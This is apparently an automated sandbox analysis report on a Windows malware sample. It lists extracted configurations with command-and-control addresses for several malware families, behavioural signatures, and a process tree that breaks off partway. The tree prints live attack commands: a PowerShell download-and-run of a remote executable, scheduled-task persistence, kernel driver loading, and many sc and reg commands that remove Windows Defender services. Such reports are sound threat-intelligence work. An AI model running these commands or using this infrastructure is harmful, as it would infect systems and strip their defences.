Analysis

  • max time kernel
    143s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250313-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250313-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01/04/2025, 17:44

General

  • Target

    2025-04-01_1cbc80c77a01e855f05fe33a43a8e977_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

  • Size

    938KB

  • MD5

    1cbc80c77a01e855f05fe33a43a8e977

  • SHA1

    1db146c4e6de2e346c0691144cfa17147fc55815

  • SHA256

    78ff4b03b39c789d662f42471312a413b005f73e496a42d4b5e7b8e18cfa84b4

  • SHA512

    453374671899392bf93fa9ea6b1070fd0981832d120092c3c9a839e43438189e8612b487b31bb35ab50595eb5f878c377a23469d746ebb56994d560e4742d91b

  • SSDEEP

    24576:TqDEvCTbMWu7rQYlBQcBiT6rprG8a0Nu:TTvC/MTQYxsWR7a0N

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

https://rodformi.run/aUosoz

https://metalsyo.digital/opsa

https://ironloxp.live/aksdd

https://navstarx.shop/FoaJSi

https://starcloc.bet/GOksAo

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://spacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

https://hadvennture.top/GKsiio

https://anavstarx.shop/FoaJSi

https://wstarcloc.bet/GOksAo

https://atargett.top/dsANGt

Extracted

Family

quasar

Version

1.4.1

Botnet

CyberPunk

C2

dakar.wohowoho.com:443

dakar.wohowoho.com:80

206.206.76.75:443

206.206.76.75:80

62.60.226.176:80

62.60.226.176:443

Mutex

5e809a5b-bb22-41b6-af20-5285e99040d3

Attributes
  • encryption_key

    A98DEEE2D49BDF1C5183B3079E9B28E281586F6F

  • install_name

    chrome.exe

  • log_directory

    Logs

  • reconnect_delay

    30000

  • startup_key

    GoogleChrome

  • subdirectory

    Google\Chrome

Extracted

Family

amadey

Version

5.33

Botnet

faec90

Attributes
  • install_dir

    52907c9546

  • install_file

    tgvazx.exe

  • strings_key

    cc9d94f7503394295f4824f8cfd50608

  • url_paths

    /Di0Her478/index.php

rc4.plain

Extracted

Family

warmcookie

C2

192.36.57.50

Attributes
  • mutex

    62580f79-f0e4-46c9-9fe6-041328dce2b7

  • user_agent

    Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Modifies security service 2 TTPs 2 IoCs
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Warmcookie family
  • Warmcookie, Badspace

    Warmcookie aka Badspace is a backdoor written in C++.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 10 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file 26 IoCs
  • Possible privilege escalation attempt 2 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 20 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 12 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 59 IoCs
  • Identifies Wine through registry keys 2 TTPs 10 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 64 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 3 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 58 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
  • Suspicious use of SetThreadContext 22 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 37 IoCs
  • Launches sc.exe 38 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 23 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 3 IoCs
  • Suspicious behavior: MapViewOfSection 23 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 35 IoCs
  • Suspicious use of SendNotifyMessage 29 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:2896
      • C:\Windows\SysWOW64\fontdrvhost.exe
        "C:\Windows\System32\fontdrvhost.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        PID:3540
      • C:\Windows\SysWOW64\fontdrvhost.exe
        "C:\Windows\System32\fontdrvhost.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        PID:7616
    • C:\Users\Admin\AppData\Local\Temp\2025-04-01_1cbc80c77a01e855f05fe33a43a8e977_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
      "C:\Users\Admin\AppData\Local\Temp\2025-04-01_1cbc80c77a01e855f05fe33a43a8e977_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
      1⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:3012
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c schtasks /create /tn 3SkIZmaCG4s /tr "mshta C:\Users\Admin\AppData\Local\Temp\NFOm4GGDO.hta" /sc minute /mo 25 /ru "Admin" /f
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:5328
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /create /tn 3SkIZmaCG4s /tr "mshta C:\Users\Admin\AppData\Local\Temp\NFOm4GGDO.hta" /sc minute /mo 25 /ru "Admin" /f
          3⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:5164
      • C:\Windows\SysWOW64\mshta.exe
        mshta C:\Users\Admin\AppData\Local\Temp\NFOm4GGDO.hta
        2⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:2624
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YKLPKUXYMDH6CD8RJ8MW8OGYZ5QCFQAJ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
          3⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Downloads MZ/PE file
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:5816
          • C:\Users\Admin\AppData\Local\TempYKLPKUXYMDH6CD8RJ8MW8OGYZ5QCFQAJ.EXE
            "C:\Users\Admin\AppData\Local\TempYKLPKUXYMDH6CD8RJ8MW8OGYZ5QCFQAJ.EXE"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2888
            • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
              "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
              5⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Downloads MZ/PE file
              • Checks BIOS information in registry
              • Checks computer location settings
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Adds Run key to start application
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:2492
              • C:\Users\Admin\AppData\Local\Temp\10404930101\PQPYAYJJ.exe
                "C:\Users\Admin\AppData\Local\Temp\10404930101\PQPYAYJJ.exe"
                6⤵
                • Checks computer location settings
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:2824
                • C:\Users\Admin\Abspawnhlp.exe
                  "C:\Users\Admin\Abspawnhlp.exe"
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of WriteProcessMemory
                  PID:4896
                  • C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe
                    C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe
                    8⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of SetThreadContext
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious behavior: MapViewOfSection
                    • Suspicious use of WriteProcessMemory
                    PID:4012
                    • C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe
                      C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe
                      9⤵
                      • Downloads MZ/PE file
                      • Checks computer location settings
                      • Loads dropped DLL
                      • Suspicious use of SetThreadContext
                      • System Location Discovery: System Language Discovery
                      • Modifies registry class
                      PID:6020
                      • C:\Windows\SysWOW64\msiexec.exe
                        "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\10000910271\FRDKTUCO.msi" /quiet
                        10⤵
                        • System Location Discovery: System Language Discovery
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4780
                      • C:\Users\Admin\AppData\Local\Temp\10000920101\LXUZVRLG.exe
                        "C:\Users\Admin\AppData\Local\Temp\10000920101\LXUZVRLG.exe"
                        10⤵
                        • Checks computer location settings
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        PID:1880
                        • C:\Users\Admin\Abspawnhlp.exe
                          "C:\Users\Admin\Abspawnhlp.exe"
                          11⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of SetThreadContext
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious behavior: MapViewOfSection
                          PID:3412
                          • C:\Users\Admin\Abspawnhlp.exe
                            C:\Users\Admin\Abspawnhlp.exe
                            12⤵
                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                            • Loads dropped DLL
                            • System Location Discovery: System Language Discovery
                            PID:3740
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\SysWOW64\cmd.exe
                            12⤵
                            • System Location Discovery: System Language Discovery
                            PID:1312
                      • C:\Users\Admin\AppData\Local\Temp\10000930101\890172171_x64.exe
                        "C:\Users\Admin\AppData\Local\Temp\10000930101\890172171_x64.exe"
                        10⤵
                        • Executes dropped EXE
                        • Drops file in Windows directory
                        PID:5700
                      • C:\Windows\SysWOW64\msiexec.exe
                        "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\10000950271\UVXEUGTZ.msi" /quiet
                        10⤵
                          PID:5680
                        • C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe
                          "C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe"
                          10⤵
                          • Executes dropped EXE
                          PID:680
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 680 -s 80
                            11⤵
                            • Program crash
                            PID:5704
                        • C:\Windows\SysWOW64\msiexec.exe
                          "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\10000970271\NBFRPMVB.msi" /quiet
                          10⤵
                          • System Location Discovery: System Language Discovery
                          PID:2668
                        • C:\Users\Admin\AppData\Local\Temp\10000980101\IEYKSCXV.exe
                          "C:\Users\Admin\AppData\Local\Temp\10000980101\IEYKSCXV.exe"
                          10⤵
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          PID:4092
                        • C:\Users\Admin\AppData\Local\Temp\10000991101\KRWXARXD.exe
                          "C:\Users\Admin\AppData\Local\Temp\10000991101\KRWXARXD.exe"
                          10⤵
                          • Checks computer location settings
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          PID:648
                          • C:\Users\Admin\CamMenuMaker.exe
                            "C:\Users\Admin\CamMenuMaker.exe"
                            11⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of SetThreadContext
                            • Suspicious behavior: MapViewOfSection
                            PID:1656
                            • C:\Users\Admin\CamMenuMaker.exe
                              C:\Users\Admin\CamMenuMaker.exe
                              12⤵
                              • Loads dropped DLL
                              • System Location Discovery: System Language Discovery
                              • Suspicious behavior: AddClipboardFormatListener
                              PID:6400
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Enc UgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AVABhAHMAawBOAGEAbQBlACAAJwB3AGkAdwBlAHIANwAuADUALgBlAHgAZQAnACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAdwBpAHcAZQByADcALgA1AC4AZQB4AGUAJwApACAALQBUAHIAaQBnAGcAZQByACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0ATwBuAGMAZQAgAC0AQQB0ACAAKABHAGUAdAAtAEQAYQB0AGUAKQAgAC0AUgBlAHAAZQB0AGkAdABpAG8AbgBJAG4AdABlAHIAdgBhAGwAIAAoAE4AZQB3AC0AVABpAG0AZQBTAHAAYQBuACAALQBNAGkAbgB1AHQAZQBzACAANQApACkAIAAtAFUAcwBlAHIAIAAkAGUAbgB2ADoAVQBzAGUAcgBOAGEAbQBlACAALQBSAHUAbgBMAGUAdgBlAGwAIABIAGkAZwBoAGUAcwB0ACAALQBTAGUAdAB0AGkAbgBnAHMAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0AUwBlAGMAbwBuAGQAcwAgADAAKQAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAASQBmAEcAbwBpAG4AZwBPAG4AQgBhAHQAdABlAHIAaQBlAHMAKQAgAC0ARgBvAHIAYwBlAA==
                                13⤵
                                • Command and Scripting Interpreter: PowerShell
                                • System Location Discovery: System Language Discovery
                                PID:6192
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\SysWOW64\cmd.exe
                              12⤵
                              • Drops file in Windows directory
                              • System Location Discovery: System Language Discovery
                              PID:8148
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\SysWOW64\cmd.exe
                        9⤵
                        • Drops file in Windows directory
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        PID:4444
                • C:\Users\Admin\AppData\Local\Temp\10405770101\h8NlU62.exe
                  "C:\Users\Admin\AppData\Local\Temp\10405770101\h8NlU62.exe"
                  6⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • Suspicious use of WriteProcessMemory
                  PID:5612
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                    7⤵
                      PID:2340
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                      7⤵
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      PID:4372
                  • C:\Users\Admin\AppData\Local\Temp\10405830101\NHq7LaU.exe
                    "C:\Users\Admin\AppData\Local\Temp\10405830101\NHq7LaU.exe"
                    6⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:2996
                    • C:\Windows\SYSTEM32\schtasks.exe
                      "schtasks" /create /tn "GoogleChrome" /sc ONLOGON /tr "C:\ProgramData\Google\Chrome\chrome.exe" /rl HIGHEST /f
                      7⤵
                      • Scheduled Task/Job: Scheduled Task
                      PID:5768
                    • C:\ProgramData\Google\Chrome\chrome.exe
                      "C:\ProgramData\Google\Chrome\chrome.exe"
                      7⤵
                      • Executes dropped EXE
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of SetWindowsHookEx
                      • Suspicious use of WriteProcessMemory
                      PID:4344
                      • C:\Windows\SYSTEM32\schtasks.exe
                        "schtasks" /create /tn "GoogleChrome" /sc ONLOGON /tr "C:\ProgramData\Google\Chrome\chrome.exe" /rl HIGHEST /f
                        8⤵
                        • Scheduled Task/Job: Scheduled Task
                        PID:1448
                  • C:\Users\Admin\AppData\Local\Temp\10405940101\qWR3lUj.exe
                    "C:\Users\Admin\AppData\Local\Temp\10405940101\qWR3lUj.exe"
                    6⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    • Suspicious use of WriteProcessMemory
                    PID:2808
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                      7⤵
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      PID:2892
                  • C:\Users\Admin\AppData\Local\Temp\10407580101\HAe88WC.exe
                    "C:\Users\Admin\AppData\Local\Temp\10407580101\HAe88WC.exe"
                    6⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    PID:3888
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                      7⤵
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      PID:1204
                  • C:\Users\Admin\AppData\Local\Temp\10407870101\apple.exe
                    "C:\Users\Admin\AppData\Local\Temp\10407870101\apple.exe"
                    6⤵
                    • Checks computer location settings
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    PID:4780
                    • C:\Users\Admin\AppData\Local\Temp\261.exe
                      "C:\Users\Admin\AppData\Local\Temp\261.exe"
                      7⤵
                      • Checks computer location settings
                      • Executes dropped EXE
                      PID:912
                      • C:\Windows\system32\cmd.exe
                        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\DF54.tmp\DF55.tmp\DF65.bat C:\Users\Admin\AppData\Local\Temp\261.exe"
                        8⤵
                          PID:3048
                          • C:\Users\Admin\AppData\Local\Temp\261.exe
                            "C:\Users\Admin\AppData\Local\Temp\261.exe" go
                            9⤵
                            • Checks computer location settings
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            PID:1972
                            • C:\Windows\system32\cmd.exe
                              "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\DFE0.tmp\DFE1.tmp\DFE2.bat C:\Users\Admin\AppData\Local\Temp\261.exe go"
                              10⤵
                              • Drops file in Program Files directory
                              PID:1048
                              • C:\Windows\system32\sc.exe
                                sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
                                11⤵
                                • Launches sc.exe
                                PID:3432
                              • C:\Windows\system32\sc.exe
                                sc start ddrver
                                11⤵
                                • Launches sc.exe
                                PID:5784
                              • C:\Windows\system32\timeout.exe
                                timeout /t 1
                                11⤵
                                • Delays execution with timeout.exe
                                PID:4628
                              • C:\Windows\system32\sc.exe
                                sc stop ddrver
                                11⤵
                                • Launches sc.exe
                                PID:60
                              • C:\Windows\system32\sc.exe
                                sc start ddrver
                                11⤵
                                • Launches sc.exe
                                PID:5612
                              • C:\Windows\system32\takeown.exe
                                takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
                                11⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                PID:3688
                              • C:\Windows\system32\icacls.exe
                                icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
                                11⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                PID:2448
                              • C:\Windows\system32\sc.exe
                                sc stop "WinDefend"
                                11⤵
                                • Launches sc.exe
                                PID:1544
                              • C:\Windows\system32\sc.exe
                                sc delete "WinDefend"
                                11⤵
                                • Launches sc.exe
                                PID:5884
                              • C:\Windows\system32\reg.exe
                                reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
                                11⤵
                                  PID:3360
                                • C:\Windows\system32\sc.exe
                                  sc stop "MDCoreSvc"
                                  11⤵
                                  • Launches sc.exe
                                  PID:2440
                                • C:\Windows\system32\sc.exe
                                  sc delete "MDCoreSvc"
                                  11⤵
                                  • Launches sc.exe
                                  PID:4084
                                • C:\Windows\system32\reg.exe
                                  reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
                                  11⤵
                                    PID:3104
                                  • C:\Windows\system32\sc.exe
                                    sc stop "WdNisSvc"
                                    11⤵
                                    • Launches sc.exe
                                    PID:3708
                                  • C:\Windows\system32\sc.exe
                                    sc delete "WdNisSvc"
                                    11⤵
                                    • Launches sc.exe
                                    PID:5176
                                  • C:\Windows\system32\reg.exe
                                    reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
                                    11⤵
                                      PID:5016
                                    • C:\Windows\system32\sc.exe
                                      sc stop "Sense"
                                      11⤵
                                      • Launches sc.exe
                                      PID:5272
                                    • C:\Windows\system32\sc.exe
                                      sc delete "Sense"
                                      11⤵
                                      • Launches sc.exe
                                      PID:3896
                                    • C:\Windows\system32\reg.exe
                                      reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
                                      11⤵
                                        PID:4028
                                      • C:\Windows\system32\sc.exe
                                        sc stop "wscsvc"
                                        11⤵
                                        • Launches sc.exe
                                        PID:3628
                                      • C:\Windows\system32\sc.exe
                                        sc delete "wscsvc"
                                        11⤵
                                        • Launches sc.exe
                                        PID:1868
                                      • C:\Windows\system32\reg.exe
                                        reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
                                        11⤵
                                        • Modifies security service
                                        PID:5860
                                      • C:\Windows\system32\sc.exe
                                        sc stop "SgrmBroker"
                                        11⤵
                                        • Launches sc.exe
                                        PID:5700
                                      • C:\Windows\system32\sc.exe
                                        sc delete "SgrmBroker"
                                        11⤵
                                        • Launches sc.exe
                                        PID:4848
                                      • C:\Windows\system32\reg.exe
                                        reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
                                        11⤵
                                          PID:3788
                                        • C:\Windows\system32\sc.exe
                                          sc stop "SecurityHealthService"
                                          11⤵
                                          • Launches sc.exe
                                          PID:1324
                                        • C:\Windows\system32\sc.exe
                                          sc delete "SecurityHealthService"
                                          11⤵
                                          • Launches sc.exe
                                          PID:2732
                                        • C:\Windows\system32\reg.exe
                                          reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
                                          11⤵
                                            PID:4816
                                          • C:\Windows\system32\sc.exe
                                            sc stop "webthreatdefsvc"
                                            11⤵
                                            • Launches sc.exe
                                            PID:4924
                                          • C:\Windows\system32\sc.exe
                                            sc delete "webthreatdefsvc"
                                            11⤵
                                            • Launches sc.exe
                                            PID:2856
                                          • C:\Windows\system32\reg.exe
                                            reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
                                            11⤵
                                              PID:4200
                                            • C:\Windows\system32\sc.exe
                                              sc stop "webthreatdefusersvc"
                                              11⤵
                                              • Launches sc.exe
                                              PID:2284
                                            • C:\Windows\system32\sc.exe
                                              sc delete "webthreatdefusersvc"
                                              11⤵
                                              • Launches sc.exe
                                              PID:5768
                                            • C:\Windows\system32\reg.exe
                                              reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
                                              11⤵
                                                PID:2428
                                              • C:\Windows\system32\sc.exe
                                                sc stop "WdNisDrv"
                                                11⤵
                                                • Launches sc.exe
                                                PID:932
                                              • C:\Windows\system32\sc.exe
                                                sc delete "WdNisDrv"
                                                11⤵
                                                • Launches sc.exe
                                                PID:3744
                                              • C:\Windows\system32\reg.exe
                                                reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
                                                11⤵
                                                  PID:836
                                                • C:\Windows\system32\sc.exe
                                                  sc stop "WdBoot"
                                                  11⤵
                                                  • Launches sc.exe
                                                  PID:1588
                                                • C:\Windows\system32\sc.exe
                                                  sc delete "WdBoot"
                                                  11⤵
                                                  • Launches sc.exe
                                                  PID:4892
                                                • C:\Windows\system32\reg.exe
                                                  reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
                                                  11⤵
                                                    PID:1448
                                                  • C:\Windows\system32\sc.exe
                                                    sc stop "WdFilter"
                                                    11⤵
                                                    • Launches sc.exe
                                                    PID:1556
                                                  • C:\Windows\system32\sc.exe
                                                    sc delete "WdFilter"
                                                    11⤵
                                                    • Launches sc.exe
                                                    PID:224
                                                  • C:\Windows\system32\reg.exe
                                                    reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
                                                    11⤵
                                                      PID:2000
                                                    • C:\Windows\system32\sc.exe
                                                      sc stop "SgrmAgent"
                                                      11⤵
                                                      • Launches sc.exe
                                                      PID:5964
                                                    • C:\Windows\system32\sc.exe
                                                      sc delete "SgrmAgent"
                                                      11⤵
                                                      • Launches sc.exe
                                                      PID:2816
                                                    • C:\Windows\system32\reg.exe
                                                      reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
                                                      11⤵
                                                        PID:5996
                                                      • C:\Windows\system32\sc.exe
                                                        sc stop "MsSecWfp"
                                                        11⤵
                                                        • Launches sc.exe
                                                        PID:2656
                                                      • C:\Windows\system32\sc.exe
                                                        sc delete "MsSecWfp"
                                                        11⤵
                                                        • Launches sc.exe
                                                        PID:4092
                                                      • C:\Windows\system32\reg.exe
                                                        reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
                                                        11⤵
                                                          PID:4932
                                                        • C:\Windows\system32\sc.exe
                                                          sc stop "MsSecFlt"
                                                          11⤵
                                                          • Launches sc.exe
                                                          PID:6040
                                                        • C:\Windows\system32\sc.exe
                                                          sc delete "MsSecFlt"
                                                          11⤵
                                                          • Launches sc.exe
                                                          PID:6024
                                                        • C:\Windows\system32\reg.exe
                                                          reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
                                                          11⤵
                                                            PID:4864
                                                          • C:\Windows\system32\sc.exe
                                                            sc stop "MsSecCore"
                                                            11⤵
